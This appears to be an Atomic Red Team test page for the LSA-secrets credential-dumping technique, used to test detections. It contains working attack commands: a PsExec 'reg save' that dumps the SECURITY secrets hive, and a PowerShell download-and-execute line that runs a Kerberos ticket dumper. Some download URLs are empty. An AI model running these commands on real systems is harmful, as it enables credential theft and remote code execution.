Try it using Invoke-Atomic

OS Credential Dumping: LSA Secrets

Description from ATT&CK

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

Reg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

Atomic Tests

Atomic Test #1 - Dumping LSA Secrets

Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.,host%2C%20local%20security%20policy%20etc.

Supported Platforms: windows

auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f


Name Description Type Default Value
psexec_exe Path to PsExec executable path PathToAtomicsFolder..\ExternalPayloads\T1003.004\bin\PsExec.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y

Cleanup Commands:

del %temp%\secrets >nul 2> nul

Dependencies: Run with powershell!

Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe}) Check Prereq Commands:

if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}

Get Prereq Commands:

Invoke-WebRequest "" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force

Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1

This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type. If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session. Ref: Author of dumper.ps1: Michael Zhmaylo (@MzHmO)

Supported Platforms: windows

auto_generated_guid: 2dfa3bff-9a27-46db-ab75-7faefdaca732



Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Invoke-Expression (New-Object Net.WebClient).DownloadString('')